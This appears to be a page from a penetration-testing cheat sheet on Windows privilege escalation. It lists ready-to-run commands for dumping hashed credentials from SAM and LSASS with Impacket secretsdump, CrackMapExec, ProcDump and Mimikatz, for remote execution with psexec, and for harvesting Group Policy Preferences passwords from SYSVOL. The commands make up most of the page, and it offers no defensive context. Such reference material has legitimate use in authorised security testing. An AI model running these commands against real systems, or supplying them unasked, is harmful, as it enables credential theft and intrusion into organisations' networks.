Privilege Escalation
SecretsDump Description: Dump hashed credentials from SAM or LSASS on a domain controller or host. Tools/Commands:
Impacket:
secretsdump.py <DOMAIN>/<USER>@<IP>
CrackMapExec:
crackmapexec smb <IP> -u <USER> -p <PASS> --sam
psexec.py <DOMAIN>/<USER>@<IP>
LSASS Dumping Description: Extract credentials from LSASS process memory. Tools/Commands:
ProcDump:
procdump.exe -ma lsass.exe lsass.dmp
Mimikatz:
sekurlsa::minidump lsass.dmp
rundll32.exe C:\path\to\procdump.dll,MiniDump <lsass_pid>
GPP Passwords Description: Extract plaintext passwords stored in Group Policy Preferences files. Tools/Commands:
PowerShell:
Get-ChildItem \\<DC>\SYSVOL /Recurse | Select-String -Pattern "password"
Metasploit:
post/windows/gather/credentials/gpp
Manual search: Look for files with
.xml
extensions containing<cpassword>
tags.
Last updated